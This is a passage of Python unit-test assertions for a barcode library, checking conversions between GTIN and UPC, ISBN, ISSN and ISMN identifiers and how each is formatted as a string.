assert str(UPC8('01987913')) == 'UPC 01987913'
assert UPC8('01987913').__str__(short = True) == '01987913'
# test ISBN conversion
assert GTIN_from_ISBN('SBN 306-40615-2') == GTIN('0-978-0-306-40615-7')
assert GTIN_from_ISBN('ISBN 5864551155') == GTIN('0-978-586455115-8')
assert GTIN_from_ISBN('ISBN 3896254170') == GTIN('0-978-389625417-7')
assert GTIN_from_ISBN('ISBN 3-89625-417-0') == GTIN('0-978-3-89625-417-7')
assert GTIN_from_ISBN('ISBN 0-306-40615-2') == GTIN('0-978-0-306-40615-7')
assert GTIN_from_ISBN('ISBN 0201530821') == GTIN('0-978-020153082-7')
assert GTIN_from_ISBN('ISBN: 1-4028-9462-7') == GTIN('0-978-1-4028-9462-6')
assert GTIN_from_ISBN('ISBN-10: 1-56619-909-3') == GTIN('0-978-1-56619-909-4')
assert GTIN_from_ISBN('ISBN-13: 978-1-56619-909-4') == GTIN('0-978-1-56619-909-4')
assert GTIN_from_ISBN('ISBN 0-553-57335-7') == GTIN('0-978-0-553-57335-0')
assert GTIN_from_ISBN('306-40615-2') == GTIN('0-978-0-306-40615-7')
assert GTIN_from_ISBN('5864551155') == GTIN('0-978-586455115-8')
assert GTIN_from_ISBN('3896254170') == GTIN('0-978-389625417-7')
assert GTIN_from_ISBN('3-89625-417-0') == GTIN('0-978-3-89625-417-7')
assert GTIN_from_ISBN('0-306-40615-2') == GTIN('0-978-0-306-40615-7')
assert GTIN_from_ISBN('0201530821') == GTIN('0-978-020153082-7')
assert GTIN_from_ISBN('1-4028-9462-7') == GTIN('0-978-1-4028-9462-6')
assert GTIN_from_ISBN('1-56619-909-3') == GTIN('0-978-1-56619-909-4')
assert GTIN_from_ISBN('978-1-56619-909-4') == GTIN('0-978-1-56619-909-4')
assert GTIN_from_ISBN('0-553-57335-7') == GTIN('0-978-0-553-57335-0')
assert GTIN_from_ISBN('ISBN 0-937383-18-X') == GTIN('0-978-0937383-18-6')
assert GTIN_from_ISBN('International Standard Book Number 0-8352-2051-6') == GTIN('09780835220514')
assert GTIN_to_ISBN('0-978-0-306-40615-7', isbn13 = False) == 'ISBN 0-306-40615-2'
assert GTIN_to_ISBN('0-978-586455115-8', isbn13 = False) == 'ISBN 5-86455-115-5'
assert GTIN_to_ISBN('0-978-389625417-7', isbn13 = False) == 'ISBN 3-89625-417-0'
assert GTIN_to_ISBN('0-978-3-89625-417-7', isbn13 = False) == 'ISBN 3-89625-417-0'
assert GTIN_to_ISBN('0-978-0-306-40615-7', isbn13 = False) == 'ISBN 0-306-40615-2'
assert GTIN_to_ISBN('0-978-020153082-7', isbn13 = False) == 'ISBN 0-201-53082-1'
assert GTIN_to_ISBN('0-978-1-4028-9462-6', isbn13 = False) == 'ISBN 1-4028-9462-7'
assert GTIN_to_ISBN('0-978-1-56619-909-4', isbn13 = False) == 'ISBN 1-56619-909-3'
assert GTIN_to_ISBN('0-978-0-553-57335-0', isbn13 = False) == 'ISBN 0-553-57335-7'
assert GTIN_to_ISBN('0-978-0937383-18-6', isbn13 = False) == 'ISBN 0-937383-18-X'
assert GTIN_to_ISBN('09780835220514', isbn13 = False) == 'ISBN 0-8352-2051-6'
assert GTIN_to_ISBN('0-978-0-306-40615-7', isbn13 = True) == 'ISBN 978-0-306-40615-7'
assert GTIN_to_ISBN('0-978-586455115-8', isbn13 = True) == 'ISBN 978-5-86455-115-8'
assert GTIN_to_ISBN('0-978-389625417-7', isbn13 = True) == 'ISBN 978-3-89625-417-7'
assert GTIN_to_ISBN('0-978-3-89625-417-7', isbn13 = True) == 'ISBN 978-3-89625-417-7'
assert GTIN_to_ISBN('0-978-0-306-40615-7', isbn13 = True) == 'ISBN 978-0-306-40615-7'
assert GTIN_to_ISBN('0-978-020153082-7', isbn13 = True) == 'ISBN 978-0-201-53082-7'
assert GTIN_to_ISBN('0-978-1-4028-9462-6', isbn13 = True) == 'ISBN 978-1-4028-9462-6'
assert GTIN_to_ISBN('0-978-1-56619-909-4', isbn13 = True) == 'ISBN 978-1-56619-909-4'
assert GTIN_to_ISBN('0-978-0-553-57335-0', isbn13 = True) == 'ISBN 978-0-553-57335-0'
assert GTIN_to_ISBN('0-978-0937383-18-6', isbn13 = True) == 'ISBN 978-0-937383-18-6'
assert GTIN_to_ISBN('09780835220514', isbn13 = True) == 'ISBN 978-0-8352-2051-4'
# test the ISBN wrapper class
assert ISBN('SBN 306-40615-2') == GTIN('0-978-0-306-40615-7')
assert ISBN('ISBN 5864551155') == GTIN('0-978-586455115-8')
assert ISBN('ISBN 3896254170') == GTIN('0-978-389625417-7')
assert ISBN('ISBN 3-89625-417-0') == GTIN('0-978-3-89625-417-7')
assert ISBN('ISBN 0-306-40615-2') == GTIN('0-978-0-306-40615-7')
assert ISBN('ISBN 0201530821') == GTIN('0-978-020153082-7')
assert ISBN('ISBN: 1-4028-9462-7') == GTIN('0-978-1-4028-9462-6')
assert ISBN('ISBN-10: 1-56619-909-3') == GTIN('0-978-1-56619-909-4')
assert ISBN('ISBN-13: 978-1-56619-909-4') == GTIN('0-978-1-56619-909-4')
assert ISBN('ISBN 0-553-57335-7') == GTIN('0-978-0-553-57335-0')
assert ISBN('ISBN 0-937383-18-X') == GTIN('0-978-0937383-18-6')
assert ISBN('International Standard Book Number 0-8352-2051-6') == GTIN('09780835220514')
global isbn13_override
old_isbn13_override = isbn13_override
try:
# simulate operation before the 2007-01-01 switch to ISBN-13
isbn13_override = False
assert str(ISBN('ISBN 978-0-306-40615-7')) == 'ISBN 0-306-40615-2'
assert ISBN('ISBN 978-0-306-40615-7').__str__(short = True) == '0306406152'
assert str(ISBN('ISBN 978-586455115-8')) == 'ISBN 5-86455-115-5'
assert ISBN('ISBN 978-586455115-8').__str__(short = True) == '5864551155'
assert str(ISBN('ISBN 978-389625417-7')) == 'ISBN 3-89625-417-0'
assert ISBN('ISBN 978-389625417-7').__str__(short = True) == '3896254170'
assert str(ISBN('ISBN 978-3-89625-417-7')) == 'ISBN 3-89625-417-0'
assert ISBN('ISBN 978-3-89625-417-7').__str__(short = True) == '3896254170'
assert str(ISBN('ISBN 978-0-306-40615-7')) == 'ISBN 0-306-40615-2'
assert ISBN('ISBN 978-0-306-40615-7').__str__(short = True) == '0306406152'
assert str(ISBN('ISBN 978-020153082-7')) == 'ISBN 0-201-53082-1'
assert ISBN('ISBN 978-020153082-7').__str__(short = True) == '0201530821'
assert str(ISBN('ISBN 978-1-4028-9462-6')) == 'ISBN 1-4028-9462-7'
assert ISBN('ISBN 978-1-4028-9462-6').__str__(short = True) == '1402894627'
assert str(ISBN('ISBN 978-1-56619-909-4')) == 'ISBN 1-56619-909-3'
assert ISBN('ISBN 978-1-56619-909-4').__str__(short = True) == '1566199093'
assert str(ISBN('ISBN 978-0-553-57335-0')) == 'ISBN 0-553-57335-7'
assert ISBN('ISBN 978-0-553-57335-0').__str__(short = True) == '0553573357'
assert str(ISBN('ISBN 0-937383-18-X')) == 'ISBN 0-937383-18-X'
assert ISBN('ISBN 0-937383-18-X').__str__(short = True) == '093738318X'
assert str(ISBN('International Standard Book Number 0-8352-2051-6')) == 'ISBN 0-8352-2051-6'
assert ISBN('International Standard Book Number 0-8352-2051-6').__str__(short = True) == '0835220516'
# simulate operation after the 2007-01-01 switch to ISBN-13
isbn13_override = True
assert str(ISBN('ISBN 978-0-306-40615-7')) == 'ISBN 978-0-306-40615-7'
assert ISBN('ISBN 978-0-306-40615-7').__str__(short = True) == '9780306406157'
assert str(ISBN('ISBN 978-586455115-8')) == 'ISBN 978-5-86455-115-8'
assert ISBN('ISBN 978-586455115-8').__str__(short = True) == '9785864551158'
assert str(ISBN('ISBN 978-389625417-7')) == 'ISBN 978-3-89625-417-7'
assert ISBN('ISBN 978-389625417-7').__str__(short = True) == '9783896254177'
assert str(ISBN('ISBN 978-3-89625-417-7')) == 'ISBN 978-3-89625-417-7'
assert ISBN('ISBN 978-3-89625-417-7').__str__(short = True) == '9783896254177'
assert str(ISBN('ISBN 978-0-306-40615-7')) == 'ISBN 978-0-306-40615-7'
assert ISBN('ISBN 978-0-306-40615-7').__str__(short = True) == '9780306406157'
assert str(ISBN('ISBN 978-020153082-7')) == 'ISBN 978-0-201-53082-7'
assert ISBN('ISBN 978-020153082-7').__str__(short = True) == '9780201530827'
assert str(ISBN('ISBN 978-1-4028-9462-6')) == 'ISBN 978-1-4028-9462-6'
assert ISBN('ISBN 978-1-4028-9462-6').__str__(short = True) == '9781402894626'
assert str(ISBN('ISBN 978-1-56619-909-4')) == 'ISBN 978-1-56619-909-4'
assert ISBN('ISBN 978-1-56619-909-4').__str__(short = True) == '9781566199094'
assert str(ISBN('ISBN 978-0-553-57335-0')) == 'ISBN 978-0-553-57335-0'
assert ISBN('ISBN 978-0-553-57335-0').__str__(short = True) == '9780553573350'
assert str(ISBN('ISBN 0-937383-18-X')) == 'ISBN 978-0-937383-18-6'
assert ISBN('ISBN 0-937383-18-X').__str__(short = True) == '9780937383186'
assert str(ISBN('International Standard Book Number 0-8352-2051-6')) == 'ISBN 978-0-8352-2051-4'
assert ISBN('International Standard Book Number 0-8352-2051-6').__str__(short = True) == '9780835220514'
assert str(ISBN('ISBN 0-306-40615-2')) == 'ISBN 978-0-306-40615-7'
assert ISBN('0306406152').__str__(short = True) == '9780306406157'
assert str(ISBN('ISBN 5-86455-115-5')) == 'ISBN 978-5-86455-115-8'
assert ISBN('5864551155').__str__(short = True) == '9785864551158'
assert str(ISBN('ISBN 3-89625-417-0')) == 'ISBN 978-3-89625-417-7'
assert ISBN('3896254170').__str__(short = True) == '9783896254177'
assert str(ISBN('ISBN 3-89625-417-0')) == 'ISBN 978-3-89625-417-7'
assert ISBN('3896254170').__str__(short = True) == '9783896254177'
assert str(ISBN('ISBN 0-306-40615-2')) == 'ISBN 978-0-306-40615-7'
assert ISBN('0306406152').__str__(short = True) == '9780306406157'
assert str(ISBN('ISBN 0-201-53082-1')) == 'ISBN 978-0-201-53082-7'
assert ISBN('0201530821').__str__(short = True) == '9780201530827'
assert str(ISBN('ISBN 1-4028-9462-7')) == 'ISBN 978-1-4028-9462-6'
assert ISBN('1402894627').__str__(short = True) == '9781402894626'
assert str(ISBN('ISBN 1-56619-909-3')) == 'ISBN 978-1-56619-909-4'
assert ISBN('1566199093').__str__(short = True) == '9781566199094'
assert str(ISBN('ISBN 0-553-57335-7')) == 'ISBN 978-0-553-57335-0'
assert ISBN('0553573357').__str__(short = True) == '9780553573350'
finally:
isbn13_override = old_isbn13_override
# test ISSN conversion
assert GTIN_from_ISSN('ISSN 0953-4563') == GTIN('09770953456001')
assert GTIN_to_ISSN('09770953456001') == 'ISSN: 0953-4563'
# test the ISSN wrapper class
assert ISSN('ISSN: 0953-4563') == GTIN('09770953456001')
assert str(ISSN('ISSN: 0953-4563')) == 'ISSN: 0953-4563'
assert ISSN('ISSN: 0953-4563').__str__(short = True) == 'ISSN09534563'
assert ISSN('ISSN: 1304-2386') == GTIN('09771304238000')
assert str(ISSN('ISSN: 1304-2386')) == 'ISSN: 1304-2386'
assert ISSN('ISSN: 1304-2386').__str__(short = True) == 'ISSN13042386'
assert ISSN('ISSN 0953-4563') == GTIN('09770953456001')
assert str(ISSN('ISSN 0953-4563')) == 'ISSN: 0953-4563'
assert ISSN('ISSN 0953-4563').__str__(short = True) == 'ISSN09534563'
assert ISSN('ISSN 1304-2386') == GTIN('09771304238000')
assert str(ISSN('ISSN 1304-2386')) == 'ISSN: 1304-2386'
assert ISSN('ISSN 1304-2386').__str__(short = True) == 'ISSN13042386'
assert ISSN('issn: 0953-4563') == GTIN('09770953456001')
assert str(ISSN('issn: 0953-4563')) == 'ISSN: 0953-4563'
assert ISSN('issn: 0953-4563').__str__(short = True) == 'ISSN09534563'
assert ISSN('issn: 1304-2386') == GTIN('09771304238000')
assert str(ISSN('issn: 1304-2386')) == 'ISSN: 1304-2386'
assert ISSN('issn: 1304-2386').__str__(short = True) == 'ISSN13042386'
assert ISSN('issn 0953-4563') == GTIN('09770953456001')
assert str(ISSN('issn 0953-4563')) == 'ISSN: 0953-4563'
assert ISSN('issn 0953-4563').__str__(short = True) == 'ISSN09534563'
assert ISSN('issn 1304-2386') == GTIN('09771304238000')
assert str(ISSN('issn 1304-2386')) == 'ISSN: 1304-2386'
assert ISSN('issn 1304-2386').__str__(short = True) == 'ISSN13042386'
# test ISMN conversion
assert GTIN_from_ISMN('M-571-10051-3') == GTIN('979-0-571-10051-3')
assert GTIN_from_ISMN('ISMN M-706700-00-7') == GTIN('9790706700007')
assert GTIN_from_ISMN('9790345123458') == GTIN('9790345123458')
assert GTIN_from_ISMN('ismn-10: m 299102349') == GTIN('0 979 0 299102349')
assert GTIN_from_ISMN('ismn-10: m 299102349') == GTIN('09790299102349')
assert GTIN_from_ISMN('ISMN-10 M 299102349') == GTIN('0 979 0 299102349')
assert GTIN_from_ISMN('ISMN-10 M 299102349') == GTIN('09790299102349')
assert GTIN_from_ISMN('ISMN-10: M 299102349') == GTIN('0 979 0 299102349')
assert GTIN_from_ISMN('ISMN-10: M 299102349') == GTIN('09790299102349')
assert GTIN_from_ISMN('ismn-10: m-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert GTIN_from_ISMN('ISMN-10 M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert GTIN_from_ISMN('ISMN-10: M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert GTIN_from_ISMN('ismn-10: m-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert GTIN_from_ISMN('ISMN-10 M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert GTIN_from_ISMN('ISMN-10: M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert GTIN_from_ISMN('ismn-10: m-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert GTIN_from_ISMN('ISMN-10 M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert GTIN_from_ISMN('ISMN-10: M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert GTIN_from_ISMN('ismn-10: m-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert GTIN_from_ISMN('ISMN-10 M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert GTIN_from_ISMN('ISMN-10: M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert GTIN_from_ISMN('ismn-10: m-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert GTIN_from_ISMN('ISMN-10 M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert GTIN_from_ISMN('ISMN-10: M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert GTIN_from_ISMN('ismn-10: m-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert GTIN_from_ISMN('ISMN-10 M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert GTIN_from_ISMN('ISMN-10: M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert GTIN_from_ISMN('ismn-10: m-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert GTIN_from_ISMN('ISMN-10 M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert GTIN_from_ISMN('ISMN-10: M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert GTIN_from_ISMN('ismn-10: m-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert GTIN_from_ISMN('ISMN-10 M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert GTIN_from_ISMN('ISMN-10: M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert GTIN_from_ISMN('ismn-10: m-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert GTIN_from_ISMN('ISMN-10 M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert GTIN_from_ISMN('ISMN-10: M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert GTIN_from_ISMN('ismn-10: m-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert GTIN_from_ISMN('ISMN-10 M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert GTIN_from_ISMN('ISMN-10: M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert GTIN_from_ISMN('ismn-13: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert GTIN_from_ISMN('ismn-13: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert GTIN_from_ISMN('ISMN-13 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert GTIN_from_ISMN('ISMN-13 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert GTIN_from_ISMN('ISMN-13: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert GTIN_from_ISMN('ISMN-13: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert GTIN_from_ISMN('ismn: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert GTIN_from_ISMN('ismn: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert GTIN_from_ISMN('ISMN 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert GTIN_from_ISMN('ISMN 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert GTIN_from_ISMN('ISMN: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert GTIN_from_ISMN('ISMN: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert GTIN_from_ISMN('ismn: m 299102349') == GTIN('0 979 0 299102349')
assert GTIN_from_ISMN('ismn: m 299102349') == GTIN('09790299102349')
assert GTIN_from_ISMN('ISMN M 299102349') == GTIN('0 979 0 299102349')
assert GTIN_from_ISMN('ISMN M 299102349') == GTIN('09790299102349')
assert GTIN_from_ISMN('ISMN: M 299102349') == GTIN('0 979 0 299102349')
assert GTIN_from_ISMN('ISMN: M 299102349') == GTIN('09790299102349')
assert GTIN_from_ISMN('ismn: m-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert GTIN_from_ISMN('ISMN M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert GTIN_from_ISMN('ISMN: M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert GTIN_from_ISMN('ismn: m-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert GTIN_from_ISMN('ISMN M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert GTIN_from_ISMN('ISMN: M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert GTIN_from_ISMN('ismn: m-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert GTIN_from_ISMN('ISMN M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert GTIN_from_ISMN('ISMN: M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert GTIN_from_ISMN('ismn: m-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert GTIN_from_ISMN('ISMN M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert GTIN_from_ISMN('ISMN: M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert GTIN_from_ISMN('ismn: m-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert GTIN_from_ISMN('ISMN M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert GTIN_from_ISMN('ISMN: M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert GTIN_from_ISMN('ismn: m-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert GTIN_from_ISMN('ISMN M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert GTIN_from_ISMN('ISMN: M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert GTIN_from_ISMN('ismn: m-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert GTIN_from_ISMN('ISMN M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert GTIN_from_ISMN('ISMN: M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert GTIN_from_ISMN('ismn: m-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert GTIN_from_ISMN('ISMN M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert GTIN_from_ISMN('ISMN: M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert GTIN_from_ISMN('ismn: m-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert GTIN_from_ISMN('ISMN M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert GTIN_from_ISMN('ISMN: M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert GTIN_from_ISMN('ismn: m-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert GTIN_from_ISMN('ISMN M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert GTIN_from_ISMN('ISMN: M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert GTIN_from_ISMN('m345123458') == GTIN('9790345123458')
assert GTIN_from_ISMN('M345123458') == GTIN('9790345123458')
assert GTIN_to_ISMN('0 979 0 123 45678 5') == 'ISMN M-1234-5678-5'
assert GTIN_to_ISMN('0-979-0-123-45678-5') == 'ISMN M-1234-5678-5'
assert GTIN_to_ISMN('0 979 0 299102349') == 'ISMN M-2991-0234-9'
assert GTIN_to_ISMN('09790299102349') == 'ISMN M-2991-0234-9'
assert GTIN_to_ISMN('0-979-0-321-76543-6') == 'ISMN M-3217-6543-6'
assert GTIN_to_ISMN('0-979-0-321-76544-3') == 'ISMN M-3217-6544-3'
assert GTIN_to_ISMN('0-979-0-321-76545-0') == 'ISMN M-3217-6545-0'
assert GTIN_to_ISMN('0-979-0-321-76546-7') == 'ISMN M-3217-6546-7'
assert GTIN_to_ISMN('0-979-0-321-76547-4') == 'ISMN M-3217-6547-4'
assert GTIN_to_ISMN('0-979-0-321-76548-1') == 'ISMN M-3217-6548-1'
assert GTIN_to_ISMN('0-979-0-321-76549-8') == 'ISMN M-3217-6549-8'
assert GTIN_to_ISMN('0-979-0-321-76550-4') == 'ISMN M-3217-6550-4'
assert GTIN_to_ISMN('0-979-0-321-76551-1') == 'ISMN M-3217-6551-1'
assert GTIN_to_ISMN('0-979-0-345-12345-8') == 'ISMN M-3451-2345-8'
assert GTIN_to_ISMN('9790345123458') == 'ISMN M-3451-2345-8'
# test the ISMN wrapper class
assert ISMN('M-571-10051-3') == GTIN('979-0-571-10051-3')
assert ISMN('ISMN M-706700-00-7') == GTIN('9790706700007')
assert ISMN('9790345123458') == GTIN('9790345123458')
assert ISMN('ismn-10: m 299102349') == GTIN('0 979 0 299102349')
assert ISMN('ismn-10: m 299102349') == GTIN('09790299102349')
assert ISMN('ISMN-10 M 299102349') == GTIN('0 979 0 299102349')
assert ISMN('ISMN-10 M 299102349') == GTIN('09790299102349')
assert ISMN('ISMN-10: M 299102349') == GTIN('0 979 0 299102349')
assert ISMN('ISMN-10: M 299102349') == GTIN('09790299102349')
assert ISMN('ismn-10: m-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert ISMN('ISMN-10 M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert ISMN('ISMN-10: M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert ISMN('ismn-10: m-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert ISMN('ISMN-10 M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert ISMN('ISMN-10: M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert ISMN('ismn-10: m-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert ISMN('ISMN-10 M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert ISMN('ISMN-10: M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert ISMN('ismn-10: m-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert ISMN('ISMN-10 M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert ISMN('ISMN-10: M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert ISMN('ismn-10: m-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert ISMN('ISMN-10 M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert ISMN('ISMN-10: M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert ISMN('ismn-10: m-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert ISMN('ISMN-10 M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert ISMN('ISMN-10: M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert ISMN('ismn-10: m-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert ISMN('ISMN-10 M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert ISMN('ISMN-10: M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert ISMN('ismn-10: m-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert ISMN('ISMN-10 M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert ISMN('ISMN-10: M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert ISMN('ismn-10: m-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert ISMN('ISMN-10 M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert ISMN('ISMN-10: M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert ISMN('ismn-10: m-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert ISMN('ISMN-10 M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert ISMN('ISMN-10: M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert ISMN('ismn-13: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert ISMN('ismn-13: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert ISMN('ISMN-13 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert ISMN('ISMN-13 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert ISMN('ISMN-13: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert ISMN('ISMN-13: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert ISMN('ismn: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert ISMN('ismn: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert ISMN('ISMN 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert ISMN('ISMN 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert ISMN('ISMN: 979 0 123 45678 5') == GTIN('0 979 0 123 45678 5')
assert ISMN('ISMN: 979-0-123-45678-5') == GTIN('0-979-0-123-45678-5')
assert ISMN('ismn: m 299102349') == GTIN('0 979 0 299102349')
assert ISMN('ismn: m 299102349') == GTIN('09790299102349')
assert ISMN('ISMN M 299102349') == GTIN('0 979 0 299102349')
assert ISMN('ISMN M 299102349') == GTIN('09790299102349')
assert ISMN('ISMN: M 299102349') == GTIN('0 979 0 299102349')
assert ISMN('ISMN: M 299102349') == GTIN('09790299102349')
assert ISMN('ismn: m-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert ISMN('ISMN M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert ISMN('ISMN: M-321-76543-6') == GTIN('0-979-0-321-76543-6')
assert ISMN('ismn: m-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert ISMN('ISMN M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert ISMN('ISMN: M-321-76544-3') == GTIN('0-979-0-321-76544-3')
assert ISMN('ismn: m-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert ISMN('ISMN M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert ISMN('ISMN: M-321-76545-0') == GTIN('0-979-0-321-76545-0')
assert ISMN('ismn: m-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert ISMN('ISMN M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert ISMN('ISMN: M-321-76546-7') == GTIN('0-979-0-321-76546-7')
assert ISMN('ismn: m-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert ISMN('ISMN M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert ISMN('ISMN: M-321-76547-4') == GTIN('0-979-0-321-76547-4')
assert ISMN('ismn: m-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert ISMN('ISMN M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert ISMN('ISMN: M-321-76548-1') == GTIN('0-979-0-321-76548-1')
assert ISMN('ismn: m-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert ISMN('ISMN M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert ISMN('ISMN: M-321-76549-8') == GTIN('0-979-0-321-76549-8')
assert ISMN('ismn: m-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert ISMN('ISMN M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert ISMN('ISMN: M-321-76550-4') == GTIN('0-979-0-321-76550-4')
assert ISMN('ismn: m-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert ISMN('ISMN M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert ISMN('ISMN: M-321-76551-1') == GTIN('0-979-0-321-76551-1')
assert ISMN('ismn: m-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert ISMN('ISMN M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert ISMN('ISMN: M-345-12345-8') == GTIN('0-979-0-345-12345-8')
assert ISMN('m345123458') == GTIN('9790345123458')
assert ISMN('M345123458') == GTIN('9790345123458')
assert str(ISMN('ISMN 979 0 123 45678 5')) == 'ISMN M-1234-5678-5'
assert str(ISMN('ISMN 979-0-123-45678-5')) == 'ISMN M-1234-5678-5'
assert str(ISMN('ISMN 979 0 299102349')) == 'ISMN M-2991-0234-9'
assert str(ISMN('ISMN 9790299102349')) == 'ISMN M-2991-0234-9'
assert str(ISMN('ISMN 979-0-321-76543-6')) == 'ISMN M-3217-6543-6'
assert str(ISMN('ISMN 979-0-321-76544-3')) == 'ISMN M-3217-6544-3'
assert str(ISMN('ISMN 979-0-321-76545-0')) == 'ISMN M-3217-6545-0'
